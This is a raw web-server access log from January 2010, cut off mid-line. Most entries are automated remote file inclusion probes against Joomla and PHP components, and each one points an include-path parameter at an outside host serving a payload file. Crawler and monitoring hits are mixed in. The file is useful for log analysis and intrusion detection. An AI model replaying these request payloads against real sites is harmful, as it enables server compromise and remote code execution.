87.106.7.77 - - [17/Jan/2010:05:30:10 -0500] "GET /logs//components/com_loudmounth/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:05:30:10 -0500] "GET //components/com_loudmounth/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:05:30:17 -0500] "GET /logs/main.php?x=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:05:30:17 -0500] "GET /main.php?x=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
95.108.128.242 - - [17/Jan/2010:05:29:13 -0500] "GET /logs/access_log.Q109102000 HTTP/1.1" 200 6621560 "-" "Yandex/1.01.001 (compatible; Win16; I)"
86.109.170.73 - - [17/Jan/2010:05:30:27 -0500] "GET /logs/access_log.Q109101000//index.php?option=com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.youth.rs/editor/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
86.109.170.73 - - [17/Jan/2010:05:30:27 -0500] "GET //index.php?option=com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.youth.rs/editor/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
86.109.170.73 - - [17/Jan/2010:05:30:27 -0500] "GET /logs//index.php?option=com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.youth.rs/editor/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:05:30:34 -0500] "GET /logs//components/com_loudmounth/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:05:30:34 -0500] "GET /logs/error_log.Q109070400//components/com_loudmounth/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:05:30:34 -0500] "GET //components/com_loudmounth/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
219.94.198.80 - - [17/Jan/2010:05:30:35 -0500] "GET /main.php?x=http://www.avto-x.ru//banners/id.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
219.94.198.80 - - [17/Jan/2010:05:30:35 -0500] "GET /logs/main.php?x=http://www.avto-x.ru//banners/id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
86.109.170.73 - - [17/Jan/2010:05:30:41 -0500] "GET /logs/access_log.Q109101000%20%20//index.php?option=com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.youth.rs/editor/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
86.109.170.73 - - [17/Jan/2010:05:30:41 -0500] "GET //index.php?option=com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.youth.rs/editor/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
86.109.170.73 - - [17/Jan/2010:05:30:41 -0500] "GET /logs//index.php?option=com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.youth.rs/editor/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:05:30:49 -0500] "GET /logs//components/com_loudmounth/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:05:30:49 -0500] "GET /logs/error_log.Q109070400//components/com_loudmounth/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:05:30:49 -0500] "GET //components/com_loudmounth/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:05:31:11 -0500] "GET /logs/access_log.Q109120100//components/com_facileforms/facileforms.frame.php?ff_compath=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
66.249.68.142 - - [17/Jan/2010:05:31:43 -0500] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L014C325B11D26800129C07M+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.175.68.18 - - [17/Jan/2010:05:32:13 -0500] "GET /logs/access_log.Q109090300//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:05:32:14 -0500] "GET /logs/access_log.Q109080500%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:05:33:17 -0500] "GET /main.php?x=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:05:33:23 -0500] "GET /logs/main.php?x=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Jan/2010:05:33:51 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.16.230.82 - - [17/Jan/2010:05:34:45 -0500] "GET /logs///components/com_hashcash/server.php?mosConfig_absolute_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:05:34:45 -0500] "GET /logs/access_log.Q109082300%20%20///components/com_hashcash/server.php?mosConfig_absolute_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:05:34:45 -0500] "GET ///components/com_hashcash/server.php?mosConfig_absolute_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
69.175.68.18 - - [17/Jan/2010:05:34:48 -0500] "GET /logs/access_log.Q109082300%20%20///components/com_hashcash/server.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
69.175.68.18 - - [17/Jan/2010:05:34:48 -0500] "GET /logs///components/com_hashcash/server.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
69.175.68.18 - - [17/Jan/2010:05:34:48 -0500] "GET ///components/com_hashcash/server.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
69.175.68.18 - - [17/Jan/2010:05:34:48 -0500] "GET /logs/access_log.Q109082300///components/com_hashcash/server.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
69.175.68.18 - - [17/Jan/2010:05:34:48 -0500] "GET /logs///components/com_hashcash/server.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
69.175.68.18 - - [17/Jan/2010:05:34:48 -0500] "GET ///components/com_hashcash/server.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
83.170.102.243 - - [17/Jan/2010:05:35:10 -0500] "GET /logs/access_log.Q109101500//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
110.45.136.177 - - [17/Jan/2010:05:35:17 -0500] "GET /logs/error_log.Q109070300%20%20///vwar/backup/errors.php?error=http://airqualityresearch.net/editor/themes/simple/.conf/icon/fxd?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
110.45.136.177 - - [17/Jan/2010:05:35:17 -0500] "GET ///vwar/backup/errors.php?error=http://airqualityresearch.net/editor/themes/simple/.conf/icon/fxd?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
110.45.136.177 - - [17/Jan/2010:05:35:17 -0500] "GET /logs///vwar/backup/errors.php?error=http://airqualityresearch.net/editor/themes/simple/.conf/icon/fxd?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:05:35:29 -0500] "GET /logs/error_log.Q109051700%20%20///components/com_hashcash/server.php?mosConfig_absolute_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:05:35:55 -0500] "GET //aws/modules/mod_cbsms_messages.php?mosConfig_absolute_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:05:35:55 -0500] "GET /logs/access_log.Q109052100%20%20//aws/modules/mod_cbsms_messages.php?mosConfig_absolute_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:05:35:55 -0500] "GET /logs//aws/modules/mod_cbsms_messages.php?mosConfig_absolute_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
123.125.66.77 - - [17/Jan/2010:05:35:59 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
83.170.102.243 - - [17/Jan/2010:05:35:59 -0500] "GET /logs/access_log.Q109101500//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
69.175.68.18 - - [17/Jan/2010:05:36:19 -0500] "GET ///components/com_hashcash/server.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
69.175.68.18 - - [17/Jan/2010:05:36:19 -0500] "GET /logs/access_log.Q109053000///components/com_hashcash/server.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
69.175.68.18 - - [17/Jan/2010:05:36:20 -0500] "GET /logs///components/com_hashcash/server.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:05:36:24 -0500] "GET //aws/modules/mod_cbsms_messages.php?mosConfig_absolute_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:05:36:24 -0500] "GET /logs/access_log.Q109052100//aws/modules/mod_cbsms_messages.php?mosConfig_absolute_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:05:36:24 -0500] "GET /logs//aws/modules/mod_cbsms_messages.php?mosConfig_absolute_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
69.175.68.18 - - [17/Jan/2010:05:36:29 -0500] "GET /logs/access_log.Q109082300///components/com_hashcash/server.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:05:36:42 -0500] "GET ///components/com_hashcash/server.php?mosConfig_absolute_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:05:36:42 -0500] "GET /logs///components/com_hashcash/server.php?mosConfig_absolute_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:05:36:42 -0500] "GET /logs/access_log.Q109053000///components/com_hashcash/server.php?mosConfig_absolute_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:05:36:48 -0500] "GET /logs/access_log.Q109082300///components/com_hashcash/server.php?mosConfig_absolute_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
195.5.163.207 - - [17/Jan/2010:05:36:49 -0500] "GET /logs/error_log.Q109060300/appserv/main.php?appserv_root=http://www.syforest.com/fx29id1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
220.181.7.124 - - [17/Jan/2010:05:36:54 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
195.5.163.207 - - [17/Jan/2010:05:36:55 -0500] "GET /logs/error_log.Q109110800/appserv/main.php?appserv_root=http://www.syforest.com/fx29id1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
83.170.102.243 - - [17/Jan/2010:05:37:15 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolutepath=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
83.170.102.243 - - [17/Jan/2010:05:37:15 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolutepath=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
83.170.102.243 - - [17/Jan/2010:05:37:15 -0500] "GET /logs/access_log.Q109091700//administrator/components/com_virtuemart/export.php?mosConfig_absolutepath=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
83.170.102.243 - - [17/Jan/2010:05:37:18 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolutepath=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
83.170.102.243 - - [17/Jan/2010:05:37:18 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolutepath=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
83.170.102.243 - - [17/Jan/2010:05:37:18 -0500] "GET /logs/access_log.Q109091700//administrator/components/com_virtuemart/export.php?mosConfig_absolutepath=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
110.45.136.177 - - [17/Jan/2010:05:37:19 -0500] "GET /logs/error_log.Q109050900%20%20///vwar/backup/errors.php?error=http://airqualityresearch.net/editor/themes/simple/.conf/icon/fxd?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
67.195.37.174 - - [17/Jan/2010:05:37:40 -0500] "GET /logs/error_log.Q109090400 HTTP/1.0" 200 2479685 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
210.94.164.28 - - [17/Jan/2010:05:38:01 -0500] "GET //appserv/main.php?appserv_root=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
210.94.164.28 - - [17/Jan/2010:05:38:01 -0500] "GET /logs//appserv/main.php?appserv_root=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
210.94.164.28 - - [17/Jan/2010:05:38:02 -0500] "GET /logs/access_log.Q109092600%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
210.94.164.28 - - [17/Jan/2010:05:38:04 -0500] "GET //appserv/main.php?appserv_root=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
210.94.164.28 - - [17/Jan/2010:05:38:04 -0500] "GET /logs/access_log.Q109092600%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
210.94.164.28 - - [17/Jan/2010:05:38:05 -0500] "GET /logs//appserv/main.php?appserv_root=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
67.195.37.174 - - [17/Jan/2010:05:37:42 -0500] "GET /logs/error_log.Q109090400 HTTP/1.0" 200 2479685 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
210.94.164.28 - - [17/Jan/2010:05:38:12 -0500] "GET /logs/error_log.Q109092600%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
210.94.164.28 - - [17/Jan/2010:05:38:12 -0500] "GET /logs/error_log.Q109091800%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
210.94.164.28 - - [17/Jan/2010:05:38:13 -0500] "GET /logs/error_log.Q109092600%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
210.94.164.28 - - [17/Jan/2010:05:38:14 -0500] "GET /logs/error_log.Q109091800%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
210.94.164.28 - - [17/Jan/2010:05:38:18 -0500] "GET /logs/access_log.Q109050700%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
210.94.164.28 - - [17/Jan/2010:05:38:21 -0500] "GET /logs/access_log.Q109050700%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
210.94.164.28 - - [17/Jan/2010:05:38:26 -0500] "GET /logs/error_log.Q109122800%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
210.94.164.28 - - [17/Jan/2010:05:38:30 -0500] "GET /logs/error_log.Q109122800%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
210.94.164.28 - - [17/Jan/2010:05:38:36 -0500] "GET /logs/error_log.Q109111300%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
210.94.164.28 - - [17/Jan/2010:05:38:36 -0500] "GET /logs/error_log.Q109050700%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
210.94.164.28 - - [17/Jan/2010:05:38:39 -0500] "GET /logs/access_log.Q109060100%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
210.94.164.28 - - [17/Jan/2010:05:38:39 -0500] "GET /logs/access_log.Q109120100%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
210.94.164.28 - - [17/Jan/2010:05:38:44 -0500] "GET /logs/error_log.Q109111300%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
210.94.164.28 - - [17/Jan/2010:05:38:44 -0500] "GET /logs/error_log.Q109050700%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
210.94.164.28 - - [17/Jan/2010:05:38:46 -0500] "GET /logs/error_log.Q109100800%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
210.94.164.28 - - [17/Jan/2010:05:38:47 -0500] "GET /logs/error_log.Q109061900%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
210.94.164.28 - - [17/Jan/2010:05:38:48 -0500] "GET /logs/error_log.Q109120100%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
210.94.164.28 - - [17/Jan/2010:05:38:48 -0500] "GET /logs/access_log.Q109080600%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:05:38:51 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 455 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:05:38:51 -0500] "GET /logs/access_log.Q109101200%20%20/////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:05:38:51 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 34524 "-" "Mozilla/5.0"
210.94.164.28 - - [17/Jan/2010:05:38:54 -0500] "GET /logs/access_log.Q109120100%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
210.94.164.28 - - [17/Jan/2010:05:38:55 -0500] "GET /logs/access_log.Q109060100%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
210.94.164.28 - - [17/Jan/2010:05:38:55 -0500] "GET /logs/error_log.Q109100800%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
210.94.164.28 - - [17/Jan/2010:05:38:56 -0500] "GET /logs/error_log.Q109061900%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
210.94.164.28 - - [17/Jan/2010:05:38:57 -0500] "GET /logs/error_log.Q109120100%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
210.94.164.28 - - [17/Jan/2010:05:38:59 -0500] "GET /logs/error_log.Q109121300%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
210.94.164.28 - - [17/Jan/2010:05:39:00 -0500] "GET /logs/error_log.Q109082600%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
210.94.164.28 - - [17/Jan/2010:05:39:01 -0500] "GET /logs/access_log.Q109080600%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
210.94.164.28 - - [17/Jan/2010:05:39:01 -0500] "GET /logs/access_log.Q109092200%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
210.94.164.28 - - [17/Jan/2010:05:39:01 -0500] "GET /logs/access_log.Q109090300%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
210.94.164.28 - - [17/Jan/2010:05:39:03 -0500] "GET /logs/error_log.Q109121300%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
210.94.164.28 - - [17/Jan/2010:05:39:03 -0500] "GET /logs/error_log.Q109082600%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:05:39:16 -0500] "GET /logs/access_log.Q109070800/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:05:39:16 -0500] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:05:39:16 -0500] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:05:39:26 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:05:39:26 -0500] "GET /logs/access_log.Q109091700//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:05:39:27 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:05:39:27 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:05:39:27 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:05:39:28 -0500] "GET /logs/access_log.Q109091700//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:05:39:28 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:05:39:28 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:05:39:29 -0500] "GET /logs/access_log.Q109091700//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:05:39:33 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:05:39:33 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
210.94.164.28 - - [17/Jan/2010:05:39:38 -0500] "GET /logs/error_log.Q109102300%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
210.94.164.28 - - [17/Jan/2010:05:39:41 -0500] "GET /logs/error_log.Q109060100%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
210.94.164.28 - - [17/Jan/2010:05:39:41 -0500] "GET /logs/access_log.Q10